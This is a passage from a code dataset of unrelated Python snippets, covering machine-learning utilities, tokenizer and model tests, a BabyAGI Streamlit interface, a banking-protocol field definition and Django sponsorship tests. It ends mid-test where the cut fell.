code stringlengths 281 23.7M |
|---|
def valid(args, train_env, val_envs, rank=(- 1)):
    """Evaluate an agent checkpoint on every validation environment.

    Builds a SoonGMapObjectNavAgent, optionally restores it from
    ``args.resume_file``, runs greedy (argmax) inference on each env in
    ``val_envs``, gathers predictions across distributed workers and, on the
    default GPU/rank, writes metric summaries and optional submission files.

    Args:
        args: experiment config namespace (log/pred dirs, resume file, submit flag).
        train_env: environment used only to construct the agent.
        val_envs: mapping of env name -> validation environment.
        rank: distributed rank; -1 means single process.
    """
    default_gpu = is_default_gpu(args)
    agent_class = SoonGMapObjectNavAgent
    agent = agent_class(args, train_env, rank=rank)
    if (args.resume_file is not None):
        print(('Loaded the listener model at iter %d from %s\n' % (agent.load(args.resume_file), args.resume_file)))
    if default_gpu:
        # Record the full configuration once, on the main process only.
        with open(os.path.join(args.log_dir, 'validation_args.json'), 'w') as outf:
            json.dump(vars(args), outf, indent=4)
        record_file = os.path.join(args.log_dir, 'valid.txt')
        write_to_record_file((str(args) + '\n\n'), record_file)
    for (env_name, env) in val_envs.items():
        # Skip environments whose submission file already exists (cheap resume).
        if os.path.exists(os.path.join(args.pred_dir, ('submit_%s.json' % env_name))):
            continue
        agent.logs = defaultdict(list)
        agent.env = env
        iters = None  # None -> run over the entire environment
        start_time = time.time()
        agent.test(use_dropout=False, feedback='argmax', iters=iters)
        print(env_name, ('cost time: %.2fs' % (time.time() - start_time)))
        preds = agent.get_results()
        # Merge per-rank prediction lists from all distributed workers.
        preds = merge_dist_results(all_gather(preds))
        if default_gpu:
            if ('test_v2' not in env_name):
                # Metrics are skipped for 'test_v2' splits — presumably no
                # ground truth is available there (confirm against env impl).
                (score_summary, _) = env.eval_metrics(preds)
                loss_str = ('Env name: %s' % env_name)
                for (metric, val) in score_summary.items():
                    loss_str += (', %s: %.2f' % (metric, val))
                write_to_record_file((loss_str + '\n'), record_file)
            if args.submit:
                json.dump(preds, open(os.path.join(args.pred_dir, ('submit_%s.json' % env_name)), 'w'), sort_keys=True, indent=4, separators=(',', ': '))
class Effect5570(BaseEffect):
    """Passive subsystem effect: boosts warfare-buff attributes of command
    burst modules by the Minmatar offensive subsystem bonus."""

    type = 'passive'

    def handler(fit, src, context, projectionRange, **kwargs):
        command_skills = ('Skirmish Command', 'Shield Command', 'Armored Command')
        buffed_attrs = ('buffDuration', 'warfareBuff1Value', 'warfareBuff2Value',
                        'warfareBuff3Value', 'warfareBuff4Value')
        for attr_name in buffed_attrs:
            fit.modules.filteredItemBoost(
                lambda mod: any(mod.item.requiresSkill(s) for s in command_skills),
                attr_name,
                src.getModifiedItemAttr('subsystemBonusMinmatarOffensive'),
                skill='Minmatar Offensive Systems',
                **kwargs)
class TANMedia5(DataElementGroup):
    """TAN medium description, version 5 (FinTS/HBCI data element group).

    Describes a single TAN medium (e.g. TAN list, chip card or mobile phone)
    as reported by the bank. Everything beyond class and status is optional.
    """
    # Class of the TAN medium (enum TANMediaClass4)
    tan_medium_class = CodeField(enum=TANMediaClass4, _d='TAN-Medium-Klasse')
    # Activation status of the medium
    status = CodeField(enum=TANMediumStatus, _d='Status')
    # Coded security function this medium applies to
    security_function = DataElementField(type='num', required=False, _d='Sicherheitsfunktion, kodiert')
    # Card-based media: card number, follow-up number and card type
    card_number = DataElementField(type='id', required=False, _d='Kartennummer')
    card_sequence = DataElementField(type='id', required=False, _d='Kartenfolgenummer')
    card_type = DataElementField(type='num', required=False, _d='Kartenart')
    # Account of the ordering customer
    account = DataElementGroupField(type=Account3, required=False, _d='Kontonummer Auftraggeber')
    # Validity window of the medium
    valid_from = DataElementField(type='dat', required=False, _d='Gultig ab')
    valid_until = DataElementField(type='dat', required=False, _d='Gultig bis')
    # TAN-list media: list identifier
    tan_list_number = DataElementField(type='an', max_length=20, required=False, _d='TAN-Listennummer')
    # Free-text label for the medium
    tan_medium_name = DataElementField(type='an', max_length=32, required=False, _d='Bezeichnung des TAN-Mediums')
    # Mobile-TAN media: phone number (masked / clear) and SMS charge account
    mobile_number_masked = DataElementField(type='an', max_length=35, required=False, _d='Mobiltelefonnummer, verschleiert')
    mobile_number = DataElementField(type='an', max_length=35, required=False, _d='Mobiltelefonnummer')
    sms_charge_account = DataElementGroupField(type=KTI1, required=False, _d='SMS-Abbuchungskonto')
    # Usage bookkeeping
    number_free_tans = DataElementField(type='num', max_length=3, required=False, _d='Anzahl freie TANs')
    last_use = DataElementField(type='dat', required=False, _d='Letzte Benutzung')
    active_since = DataElementField(type='dat', required=False, _d='Freigeschaltet am')
class BasicBlock(nn.Module):
    """ResNet basic residual block: two 3x3 convs with BatchNorm and ReLU,
    plus an optional 1x1 projection on the shortcut when channels or stride
    change.

    Fix: the first activation previously used functional ``F.relu`` while the
    rest of the block used the ``self.relu`` member; unified on ``self.relu``
    for consistency (both compute the same ReLU).
    """

    def __init__(self, in_chan, out_chan, stride=1):
        super(BasicBlock, self).__init__()
        self.conv1 = conv3x3(in_chan, out_chan, stride)
        self.bn1 = nn.BatchNorm2d(out_chan)
        self.conv2 = conv3x3(out_chan, out_chan)
        self.bn2 = nn.BatchNorm2d(out_chan)
        self.relu = nn.ReLU(inplace=True)
        # 1x1 projection so the shortcut matches the residual's shape.
        self.downsample = None
        if (in_chan != out_chan) or (stride != 1):
            self.downsample = nn.Sequential(
                nn.Conv2d(in_chan, out_chan, kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(out_chan),
            )

    def forward(self, x):
        """Apply conv-bn-relu-conv-bn, add the (possibly projected) shortcut,
        then a final ReLU."""
        residual = self.conv1(x)
        residual = self.relu(self.bn1(residual))
        residual = self.conv2(residual)
        residual = self.bn2(residual)
        shortcut = x
        if self.downsample is not None:
            shortcut = self.downsample(x)
        out = shortcut + residual
        out = self.relu(out)
        return out
def get_rmm_device_memory_usage() -> Optional[int]:
    """Return RMM's currently allocated device memory in bytes.

    Returns None when RMM is not installed or when no tracking/statistics
    adaptor is present anywhere in the current device resource chain.
    """
    try:
        import rmm
    except ImportError:
        return None

    # Walk the memory-resource chain from the current device resource down
    # through each upstream adaptor, reporting from the first one that
    # records allocation totals.
    resource = rmm.mr.get_current_device_resource()
    while resource is not None:
        if isinstance(resource, rmm.mr.TrackingResourceAdaptor):
            return resource.get_allocated_bytes()
        if isinstance(resource, rmm.mr.StatisticsResourceAdaptor):
            return resource.allocation_counts['current_bytes']
        resource = getattr(resource, 'upstream_mr', None)
    return None
def __compute_folding_ranges(tree, lines):
    """Walk a parso syntax tree and collect code-folding ranges.

    Traverses ``tree`` depth-first (children are pushed onto the front of the
    work list), mapping each foldable start line to the maximum end line seen
    for it. Returns a sorted list of ``(start_line, end_line)`` pairs.
    """
    folding_ranges = {}
    stack = [tree]
    while (len(stack) > 0):
        node = stack.pop(0)
        if isinstance(node, tree_nodes.Newline):
            # Pure newline nodes carry no foldable structure.
            continue
        if isinstance(node, tree_nodes.PythonErrorNode):
            # Syntax error: from the error position onward, fall back to
            # indentation-based folding, merge it with what we have so far,
            # and stop traversing the (unreliable) tree.
            (start_line, _) = node.start_pos
            start_line -= 1
            # Pad with empty lines so line numbers in the fallback text still
            # match the original document.
            padding = ([''] * start_line)
            text = ('\n'.join((padding + lines[start_line:])) + '\n')
            identation_ranges = __compute_folding_ranges_identation(text)
            folding_ranges = __merge_folding_ranges(folding_ranges, identation_ranges)
            break
        if (not isinstance(node, SKIP_NODES)):
            valid = __check_if_node_is_valid(node)
            if valid:
                # May also mutate the work list (e.g. to skip handled children).
                (start_line, end_line, stack) = __compute_start_end_lines(node, stack)
                if (end_line > start_line):
                    # Keep the widest range recorded for this start line.
                    current_end = folding_ranges.get(start_line, (- 1))
                    folding_ranges[start_line] = max(current_end, end_line)
        if hasattr(node, 'children'):
            # Depth-first: children are processed before remaining siblings.
            stack = (node.children + stack)
    folding_ranges = sorted(folding_ranges.items())
    return folding_ranges
class ByT5TokenizationTest(TokenizerTesterMixin, unittest.TestCase):
    """Test suite for the byte-level ByT5 tokenizer (slow tokenizer only).

    Fixes applied:
    - the ``t5_base_tokenizer`` decorator was a bare ``_property`` statement,
      which raises NameError when the class body executes; restored to
      ``@property``.
    - the multibyte-character test strings had their non-ASCII characters
      stripped; reconstructed from the expected byte ids (ByT5 ids are
      byte value + 3 special tokens: 229,133,175 -> 0xE2 0x82 0xAC = '€';
      198,171..174 -> 0xC3 0xA8..0xAB = 'è','é','ê','ë').
    - in ``get_clean_sequence``, an id that failed to decode appended a stale
      (or unbound) ``tok``; now skipped with ``continue``.
    """

    tokenizer_class = ByT5Tokenizer
    test_rust_tokenizer = False

    def setUp(self):
        super().setUp()
        tokenizer = ByT5Tokenizer()
        tokenizer.save_pretrained(self.tmpdirname)

    @property
    def t5_base_tokenizer(self):
        """Pretrained small ByT5 tokenizer used by the integration tests."""
        return ByT5Tokenizer.from_pretrained('google/byt5-small')

    def get_tokenizer(self, **kwargs) -> ByT5Tokenizer:
        return self.tokenizer_class.from_pretrained(self.tmpdirname, **kwargs)

    def get_clean_sequence(self, tokenizer, with_prefix_space=False, max_length=20, min_length=5) -> Tuple[(str, list)]:
        """Build a (text, ids) pair of round-trippable ASCII tokens for the
        generic mixin tests."""
        toks = []
        for i in range(len(tokenizer)):
            try:
                tok = tokenizer.decode([i], clean_up_tokenization_spaces=False)
            except UnicodeDecodeError:
                # Skip ids that do not decode to valid text.
                continue
            toks.append((i, tok))
        # Keep only tokens made of ASCII letters/spaces that encode back to
        # exactly their own id.
        toks = list(filter((lambda t: re.match('^[ a-zA-Z]+$', t[1])), toks))
        toks = list(filter((lambda t: ([t[0]] == tokenizer.encode(t[1], add_special_tokens=False))), toks))
        if ((max_length is not None) and (len(toks) > max_length)):
            toks = toks[:max_length]
        if ((min_length is not None) and (len(toks) < min_length) and (len(toks) > 0)):
            # Repeat the list until the minimum length is reached.
            while (len(toks) < min_length):
                toks = (toks + toks)
        toks_ids = [t[0] for t in toks]
        output_txt = tokenizer.decode(toks_ids, clean_up_tokenization_spaces=False)
        if ((' ' not in output_txt) and (len(toks_ids) > 1)):
            # Force at least one space so downstream tests can split the text.
            output_txt = ((tokenizer.decode([toks_ids[0]], clean_up_tokenization_spaces=False) + ' ') + tokenizer.decode(toks_ids[1:], clean_up_tokenization_spaces=False))
        if with_prefix_space:
            output_txt = (' ' + output_txt)
        output_ids = tokenizer.encode(output_txt, add_special_tokens=False)
        return (output_txt, output_ids)

    def test_eos_treatment(self):
        """An explicit '</s>' in the text must equal the auto-appended EOS."""
        tokenizer = self.t5_base_tokenizer
        batch_with_eos_added = tokenizer(['hi</s>', 'I went to the gym</s>', '</s>'])
        batch_without_eos_added = tokenizer(['hi', 'I went to the gym', ''])
        self.assertListEqual(batch_with_eos_added['input_ids'], batch_without_eos_added['input_ids'])

    def test_multibytes_char(self):
        """Multi-byte UTF-8 characters map to one id per byte (offset by 3)."""
        tokenizer = self.t5_base_tokenizer
        src_text = 'Unicode €.'
        encoded = tokenizer(src_text)
        encoded_ids = [88, 113, 108, 102, 114, 103, 104, 35, 229, 133, 175, 49, 1]
        self.assertEqual(encoded['input_ids'], encoded_ids)
        decoded = tokenizer.decode(encoded_ids)
        self.assertEqual(decoded, 'Unicode €.</s>')
        encoded = tokenizer('e è é ê ë')
        encoded_ids = [104, 35, 198, 171, 35, 198, 172, 35, 198, 173, 35, 198, 174, 1]
        self.assertEqual(encoded['input_ids'], encoded_ids)
        decoded = tokenizer.decode(encoded_ids)
        self.assertEqual(decoded, 'e è é ê ë</s>')
        self.assertEqual(tokenizer.decode(tokenizer.encode('e è é ê ë')), 'e è é ê ë</s>')

    def test_prepare_batch_integration(self):
        """Batched encoding pads to the longest sequence and matches shapes."""
        tokenizer = self.t5_base_tokenizer
        src_text = ['A long paragraph for summarization.', 'Another paragraph for summarization.']
        expected_src_tokens = [68, 35, 111, 114, 113, 106, 35, 115, 100, 117, 100, 106, 117, 100, 115, 107, 35, 105, 114, 117, 35, 118, 120, 112, 112, 100, 117, 108, 125, 100, 119, 108, 114, 113, 49, 1, 0]
        batch = tokenizer(src_text, padding=True, return_tensors=FRAMEWORK)
        self.assertIsInstance(batch, BatchEncoding)
        if (FRAMEWORK != 'jax'):
            result = list(batch.input_ids.numpy()[0])
        else:
            result = list(batch.input_ids.tolist()[0])
        self.assertListEqual(expected_src_tokens, result)
        self.assertEqual((2, 37), batch.input_ids.shape)
        self.assertEqual((2, 37), batch.attention_mask.shape)

    def test_empty_target_text(self):
        """Encoding source-only text must not emit decoder fields."""
        tokenizer = self.t5_base_tokenizer
        src_text = ['A long paragraph for summarization.', 'Another paragraph for summarization.']
        batch = tokenizer(src_text, padding=True, return_tensors=FRAMEWORK)
        self.assertIn('input_ids', batch)
        self.assertIn('attention_mask', batch)
        self.assertNotIn('decoder_input_ids', batch)
        self.assertNotIn('decoder_attention_mask', batch)

    def test_max_length_integration(self):
        """max_length padding/truncation applies to target encoding."""
        tokenizer = self.t5_base_tokenizer
        tgt_text = ['Summary of the text.', 'Another summary.']
        with tokenizer.as_target_tokenizer():
            targets = tokenizer(tgt_text, max_length=32, padding='max_length', truncation=True, return_tensors=FRAMEWORK)
        self.assertEqual(32, targets['input_ids'].shape[1])

    def test_eos_in_input(self):
        """A literal '</s>' in source/target text becomes the EOS id (1)."""
        tokenizer = self.t5_base_tokenizer
        src_text = ['A long paragraph for summarization. </s>']
        tgt_text = ['Summary of the text. </s>']
        expected_src_tokens = [68, 35, 111, 114, 113, 106, 35, 115, 100, 117, 100, 106, 117, 100, 115, 107, 35, 105, 114, 117, 35, 118, 120, 112, 112, 100, 117, 108, 125, 100, 119, 108, 114, 113, 49, 35, 1]
        expected_tgt_tokens = [86, 120, 112, 112, 100, 117, 124, 35, 114, 105, 35, 119, 107, 104, 35, 119, 104, 123, 119, 49, 35, 1]
        batch = tokenizer(src_text)
        with tokenizer.as_target_tokenizer():
            targets = tokenizer(tgt_text)
        self.assertEqual(expected_src_tokens, batch['input_ids'][0])
        self.assertEqual(expected_tgt_tokens, targets['input_ids'][0])

    def test_save_and_load_tokenizer(self):
        """Round-trip save_pretrained/from_pretrained preserves tokens, added
        special tokens and model_max_length."""
        tokenizers = self.get_tokenizers()
        for tokenizer in tokenizers:
            with self.subTest(f'{tokenizer.__class__.__name__}'):
                self.assertNotEqual(tokenizer.model_max_length, 42)
        # Plain round-trip: same encoding before and after save/load.
        tokenizers = self.get_tokenizers()
        for tokenizer in tokenizers:
            with self.subTest(f'{tokenizer.__class__.__name__}'):
                tmpdirname = tempfile.mkdtemp()
                sample_text = ' He is very happy, UNwanted,running'
                before_tokens = tokenizer.encode(sample_text, add_special_tokens=False)
                tokenizer.save_pretrained(tmpdirname)
                after_tokenizer = tokenizer.__class__.from_pretrained(tmpdirname)
                after_tokens = after_tokenizer.encode(sample_text, add_special_tokens=False)
                self.assertListEqual(before_tokens, after_tokens)
                shutil.rmtree(tmpdirname)
        # Round-trip with added tokens, extra special tokens and a custom
        # model_max_length.
        tokenizers = self.get_tokenizers(model_max_length=42)
        for tokenizer in tokenizers:
            with self.subTest(f'{tokenizer.__class__.__name__}'):
                tmpdirname = tempfile.mkdtemp()
                sample_text = ' He is very happy, UNwanted,running'
                tokenizer.add_tokens(['bim', 'bambam'])
                additional_special_tokens = tokenizer.additional_special_tokens
                additional_special_tokens.append('new_additional_special_token')
                tokenizer.add_special_tokens({'additional_special_tokens': additional_special_tokens})
                before_tokens = tokenizer.encode(sample_text, add_special_tokens=False)
                tokenizer.save_pretrained(tmpdirname)
                after_tokenizer = tokenizer.__class__.from_pretrained(tmpdirname)
                after_tokens = after_tokenizer.encode(sample_text, add_special_tokens=False)
                self.assertListEqual(before_tokens, after_tokens)
                self.assertIn('new_additional_special_token', after_tokenizer.additional_special_tokens)
                self.assertEqual(after_tokenizer.model_max_length, 42)
                tokenizer = tokenizer.__class__.from_pretrained(tmpdirname, model_max_length=43)
                self.assertEqual(tokenizer.model_max_length, 43)
                shutil.rmtree(tmpdirname)

    def test_special_tokens_initialization_with_non_empty_additional_special_tokens(self):
        """Additional special tokens injected via the saved config files and
        via from_pretrained kwargs must both survive loading."""
        tokenizer_list = []
        if self.test_slow_tokenizer:
            tokenizer_list.append((self.tokenizer_class, self.get_tokenizer()))
        if self.test_rust_tokenizer:
            tokenizer_list.append((self.rust_tokenizer_class, self.get_rust_tokenizer()))
        for (tokenizer_class, tokenizer_utils) in tokenizer_list:
            with tempfile.TemporaryDirectory() as tmp_dir:
                tokenizer_utils.save_pretrained(tmp_dir)
                with open(os.path.join(tmp_dir, 'special_tokens_map.json'), encoding='utf-8') as json_file:
                    special_tokens_map = json.load(json_file)
                with open(os.path.join(tmp_dir, 'tokenizer_config.json'), encoding='utf-8') as json_file:
                    tokenizer_config = json.load(json_file)
                # Rewrite both config files with extra special tokens.
                added_tokens_extra_ids = [f'<extra_id_{i}>' for i in range(125)]
                special_tokens_map['additional_special_tokens'] = (added_tokens_extra_ids + ['an_additional_special_token'])
                tokenizer_config['additional_special_tokens'] = (added_tokens_extra_ids + ['an_additional_special_token'])
                with open(os.path.join(tmp_dir, 'special_tokens_map.json'), 'w', encoding='utf-8') as outfile:
                    json.dump(special_tokens_map, outfile)
                with open(os.path.join(tmp_dir, 'tokenizer_config.json'), 'w', encoding='utf-8') as outfile:
                    json.dump(tokenizer_config, outfile)
                tokenizer_without_change_in_init = tokenizer_class.from_pretrained(tmp_dir)
                self.assertIn('an_additional_special_token', tokenizer_without_change_in_init.additional_special_tokens)
                self.assertEqual(['an_additional_special_token'], tokenizer_without_change_in_init.convert_ids_to_tokens(tokenizer_without_change_in_init.convert_tokens_to_ids(['an_additional_special_token'])))
                # Tokens passed directly to from_pretrained take effect too.
                new_added_tokens = (added_tokens_extra_ids + [AddedToken('a_new_additional_special_token', lstrip=True)])
                tokenizer = tokenizer_class.from_pretrained(tmp_dir, additional_special_tokens=new_added_tokens)
                self.assertIn('a_new_additional_special_token', tokenizer.additional_special_tokens)
                self.assertEqual(['a_new_additional_special_token'], tokenizer.convert_ids_to_tokens(tokenizer.convert_tokens_to_ids(['a_new_additional_special_token'])))

    def test_decode_single_bytes(self):
        """A lone continuation byte (0xFF -> id 255) decodes to empty text."""
        tokenizer_list = []
        if self.test_slow_tokenizer:
            tokenizer_list.append((self.tokenizer_class, self.get_tokenizer()))
        if self.test_rust_tokenizer:
            tokenizer_list.append((self.rust_tokenizer_class, self.get_rust_tokenizer()))
        for (tokenizer_class, tokenizer_utils) in tokenizer_list:
            with tempfile.TemporaryDirectory() as tmp_dir:
                tokenizer_utils.save_pretrained(tmp_dir)
                tokenizer = tokenizer_class.from_pretrained(tmp_dir)
                self.assertTrue((tokenizer.decode([255]) == ''))

    # The following mixin tests do not apply to a vocabulary-free byte
    # tokenizer and are intentionally disabled.
    def test_pretrained_model_lists(self):
        pass

    def test_get_vocab(self):
        pass

    def test_pretokenized_inputs(self):
        pass

    def test_conversion_reversible(self):
        pass
# NOTE(review): the two decorators had lost their `@pytest.mark` prefix,
# leaving bare `.unit()` / `.parametrize(...)` lines — a module-level syntax
# error. Restored the standard pytest markers; confirm `unit` matches this
# project's registered marker name.
@pytest.mark.unit()
@pytest.mark.parametrize(
    ('func', 'name', 'expectation', 'expected'),
    [
        (task_func, None, does_not_raise(), 'task_func'),
        (task_func, 'name', does_not_raise(), 'name'),
        (partial(task_func, x=1), None, does_not_raise(), 'task_func'),
        (partial(task_func, x=1), 'name', does_not_raise(), 'name'),
        ((lambda x: None), None, does_not_raise(), '<lambda>'),
        (partial((lambda x: None), x=1), None, does_not_raise(), '<lambda>'),
        (1, None, pytest.raises(NotImplementedError, match='Cannot'), None),
    ],
)
def test_parse_name(func, name, expectation, expected):
    """_parse_name prefers an explicit name, falls back to the callable's
    __name__ (unwrapping functools.partial), and rejects non-callables."""
    with expectation:
        result = _parse_name(func, name)
        assert (result == expected)
def parser_options():
    """Parse command-line arguments and load the experiment options.

    Reads the ``--path_opt`` argument (a YAML file path) and returns the
    parsed options as a dict.
    """
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument(
        '--path_opt',
        default='option/SYDNEY_GaLR.yaml',
        type=str,
        help='path to a yaml options file',
    )
    cli_args = arg_parser.parse_args()
    with open(cli_args.path_opt, 'r') as handle:
        return yaml.safe_load(handle)
def get_test_data(n1, offset, n2):
    """Build an IntelHex image with two data regions separated by a gap.

    Writes ``n1`` bytes starting at address 0, skips ``offset`` addresses,
    then writes ``n2`` more bytes; each byte is its address modulo 256.
    Returns (total byte count, hex-file text, the IntelHex object).
    """
    ih = intelhex.IntelHex()
    addr = 0
    # First region: addresses [0, n1).
    for _ in range_g(n1):
        ih[addr] = addr % 256
        addr += 1
    # Leave a hole of `offset` unset addresses.
    addr += offset
    # Second region: n2 bytes after the gap.
    for _ in range_g(n2):
        ih[addr] = addr % 256
        addr += 1
    buf = StringIO()
    ih.write_hex_file(buf)
    hexstr = buf.getvalue()
    buf.close()
    return (n1 + n2, hexstr, ih)
def test_singlediode_series(cec_module_params):
    """singlediode should return a DataFrame when fed Series inputs."""
    index = pd.date_range(start='2015-01-01', periods=2, freq='12H')
    irradiance = pd.Series([0.0, 800.0], index=index)
    # Derive the five single-diode parameters from the CEC module record.
    photocurrent, sat_current, r_series, r_shunt, nNsVth = pvsystem.calcparams_desoto(
        irradiance,
        temp_cell=25,
        alpha_sc=cec_module_params['alpha_sc'],
        a_ref=cec_module_params['a_ref'],
        I_L_ref=cec_module_params['I_L_ref'],
        I_o_ref=cec_module_params['I_o_ref'],
        R_sh_ref=cec_module_params['R_sh_ref'],
        R_s=cec_module_params['R_s'],
        EgRef=1.121,
        dEgdT=(- 0.0002677),
    )
    result = pvsystem.singlediode(photocurrent, sat_current, r_series, r_shunt, nNsVth)
    assert isinstance(result, pd.DataFrame)
def main():
    """Render the BabyAGI Streamlit UI and run the agent on demand."""
    st.set_page_config(initial_sidebar_state='expanded', page_title='BabyAGI UI', layout='centered')

    # Model configuration lives in the sidebar.
    with st.sidebar:
        api_key = st.text_input('Your OpenAI API KEY', type='password')
        selected_model = st.selectbox('Model name', options=['gpt-3.5-turbo', 'gpt-4', 'text-davinci-003'])
        temp = st.slider(label='Temperature', min_value=0.0, max_value=1.0, step=0.1, value=0.5)

    # Main panel: objective, seed task and iteration budget.
    st.title('BabyAGI UI')
    goal = st.text_input('Input Ultimate goal', 'Solve world hunger')
    initial_task = st.text_input('Input Where to start', 'Develop a task list')
    iteration_limit = st.number_input('Max iterations', value=3, min_value=1, step=1)
    run_clicked = st.button('Run')

    # Vector store seeded with a placeholder text tagged with the first task.
    embeddings = HuggingFaceEmbeddings()
    store = FAISS.from_texts(['_'], embeddings, metadatas=[{'task': initial_task}])

    if run_clicked:
        try:
            agent = BabyAGI.from_llm_and_objectives(
                llm=OpenAI(openai_api_key=api_key, temperature=temp, model_name=selected_model),
                vectorstore=store,
                objective=goal,
                first_task=initial_task,
                verbose=False,
            )
            agent.run(max_iterations=iteration_limit)
        except Exception as e:
            # Surface any failure (bad key, network, ...) in the UI.
            st.error(e)
class SponsorshipModelTests(TestCase):
    """Unit tests for the Sponsorship model: creation, status transitions,
    fee/benefit bookkeeping and contract interactions."""

    def setUp(self):
        # Five benefits attached to one package, plus a sponsor and a user
        # to submit applications with.
        self.benefits = baker.make(SponsorshipBenefit, _quantity=5, _fill_optional=True)
        self.package = baker.make('sponsors.SponsorshipPackage', name='PSF Sponsorship Program', sponsorship_amount=100)
        self.package.benefits.add(*self.benefits)
        self.sponsor = baker.make('sponsors.Sponsor')
        self.user = baker.make(settings.AUTH_USER_MODEL)

    def test_control_sponsorship_next_status(self):
        """next_status exposes the allowed transitions for each status."""
        states_map = {Sponsorship.APPLIED: [Sponsorship.APPROVED, Sponsorship.REJECTED], Sponsorship.APPROVED: [Sponsorship.FINALIZED], Sponsorship.REJECTED: [], Sponsorship.FINALIZED: []}
        for (status, exepcted) in states_map.items():
            sponsorship = baker.prepare(Sponsorship, status=status)
            self.assertEqual(sponsorship.next_status, exepcted)

    def test_create_new_sponsorship(self):
        """Sponsorship.new without a package starts in APPLIED with no fee,
        no dates and every benefit flagged as user-added."""
        sponsorship = Sponsorship.new(self.sponsor, self.benefits, submited_by=self.user)
        self.assertTrue(sponsorship.pk)
        sponsorship.refresh_from_db()
        current_year = SponsorshipCurrentYear.get_year()
        self.assertEqual(sponsorship.submited_by, self.user)
        self.assertEqual(sponsorship.sponsor, self.sponsor)
        self.assertEqual(sponsorship.applied_on, date.today())
        self.assertEqual(sponsorship.status, Sponsorship.APPLIED)
        self.assertIsNone(sponsorship.approved_on)
        self.assertIsNone(sponsorship.rejected_on)
        self.assertIsNone(sponsorship.finalized_on)
        self.assertIsNone(sponsorship.start_date)
        self.assertIsNone(sponsorship.end_date)
        self.assertEqual(sponsorship.level_name, '')
        self.assertIsNone(sponsorship.sponsorship_fee)
        self.assertIsNone(sponsorship.agreed_fee)
        self.assertIsNone(sponsorship.package)
        self.assertTrue(sponsorship.for_modified_package)
        self.assertEqual(sponsorship.year, current_year)
        self.assertEqual(sponsorship.benefits.count(), len(self.benefits))
        # Each SponsorBenefit snapshots the benefit's data at creation time.
        for benefit in self.benefits:
            sponsor_benefit = sponsorship.benefits.get(sponsorship_benefit=benefit)
            self.assertTrue(sponsor_benefit.added_by_user)
            self.assertEqual(sponsor_benefit.name, benefit.name)
            self.assertEqual(sponsor_benefit.description, benefit.description)
            self.assertEqual(sponsor_benefit.program, benefit.program)
            self.assertEqual(sponsor_benefit.benefit_internal_value, benefit.internal_value)

    def test_create_new_sponsorship_with_package(self):
        """Exactly matching a package copies its name/fee and marks the
        application as unmodified."""
        sponsorship = Sponsorship.new(self.sponsor, self.benefits, package=self.package)
        self.assertTrue(sponsorship.pk)
        sponsorship.refresh_from_db()
        self.assertEqual(sponsorship.level_name, 'PSF Sponsorship Program')
        self.assertEqual(sponsorship.sponsorship_fee, 100)
        self.assertEqual(sponsorship.agreed_fee, 100)
        self.assertFalse(sponsorship.for_modified_package)
        self.assertEqual(sponsorship.package, self.package)
        for benefit in sponsorship.benefits.all():
            self.assertFalse(benefit.added_by_user)

    def test_create_new_sponsorship_with_package_modifications(self):
        """Dropping package benefits flags the package as modified and voids
        the agreed fee."""
        benefits = self.benefits[:2]
        sponsorship = Sponsorship.new(self.sponsor, benefits, package=self.package)
        self.assertTrue(sponsorship.pk)
        sponsorship.refresh_from_db()
        self.assertTrue(sponsorship.for_modified_package)
        self.assertEqual(sponsorship.benefits.count(), 2)
        self.assertIsNone(sponsorship.agreed_fee)
        for benefit in sponsorship.benefits.all():
            self.assertFalse(benefit.added_by_user)

    def test_create_new_sponsorship_with_package_added_benefit(self):
        """A benefit outside the package is tracked as user-added."""
        extra_benefit = baker.make(SponsorshipBenefit)
        benefits = (self.benefits + [extra_benefit])
        sponsorship = Sponsorship.new(self.sponsor, benefits, package=self.package)
        sponsorship.refresh_from_db()
        self.assertTrue(sponsorship.for_modified_package)
        self.assertEqual(sponsorship.benefits.count(), 6)
        for benefit in self.benefits:
            sponsor_benefit = sponsorship.benefits.get(sponsorship_benefit=benefit)
            self.assertFalse(sponsor_benefit.added_by_user)
            self.assertIn(sponsor_benefit, sponsorship.package_benefits)
        sponsor_benefit = sponsorship.benefits.get(sponsorship_benefit=extra_benefit)
        self.assertTrue(sponsor_benefit.added_by_user)
        self.assertEqual([sponsor_benefit], list(sponsorship.added_benefits))

    def test_estimated_cost_property(self):
        """estimated_cost is snapshotted at creation, so later changes to the
        benefits' internal_value do not affect it."""
        sponsorship = Sponsorship.new(self.sponsor, self.benefits)
        estimated_cost = sum((b.internal_value for b in self.benefits))
        self.assertNotEqual(estimated_cost, 0)
        self.assertEqual(estimated_cost, sponsorship.estimated_cost)
        # Zero the live benefits: the stored estimate must not change.
        SponsorshipBenefit.objects.all().update(internal_value=0)
        self.assertEqual(estimated_cost, sponsorship.estimated_cost)

    def test_approve_sponsorship(self):
        """approve() stamps approved_on and moves to APPROVED."""
        start = date.today()
        end = (start + timedelta(days=10))
        sponsorship = Sponsorship.new(self.sponsor, self.benefits)
        self.assertEqual(sponsorship.status, Sponsorship.APPLIED)
        self.assertIsNone(sponsorship.approved_on)
        sponsorship.approve(start, end)
        self.assertEqual(sponsorship.approved_on, timezone.now().date())
        self.assertEqual(sponsorship.status, Sponsorship.APPROVED)
        self.assertTrue(sponsorship.start_date, start)
        self.assertTrue(sponsorship.end_date, end)

    def test_exception_if_invalid_date_range_when_approving(self):
        """approve() rejects an empty date range (start == end)."""
        start = date.today()
        sponsorship = Sponsorship.new(self.sponsor, self.benefits)
        self.assertEqual(sponsorship.status, Sponsorship.APPLIED)
        self.assertIsNone(sponsorship.approved_on)
        with self.assertRaises(SponsorshipInvalidDateRangeException):
            sponsorship.approve(start, start)

    def test_rollback_sponsorship_to_edit(self):
        """rollback_to_editing() resets APPLIED/APPROVED/REJECTED back to
        APPLIED, but is forbidden once FINALIZED."""
        sponsorship = Sponsorship.new(self.sponsor, self.benefits)
        can_rollback_from = [Sponsorship.APPLIED, Sponsorship.APPROVED, Sponsorship.REJECTED]
        for status in can_rollback_from:
            sponsorship.status = status
            sponsorship.save()
            sponsorship.refresh_from_db()
            sponsorship.rollback_to_editing()
            self.assertEqual(sponsorship.status, Sponsorship.APPLIED)
            self.assertIsNone(sponsorship.approved_on)
            self.assertIsNone(sponsorship.rejected_on)
        sponsorship.status = Sponsorship.FINALIZED
        sponsorship.save()
        sponsorship.refresh_from_db()
        with self.assertRaises(InvalidStatusException):
            sponsorship.rollback_to_editing()

    def test_rollback_approved_sponsorship_with_contract_should_delete_it(self):
        """Rolling back an approved sponsorship deletes its draft contract."""
        sponsorship = Sponsorship.new(self.sponsor, self.benefits)
        sponsorship.status = Sponsorship.APPROVED
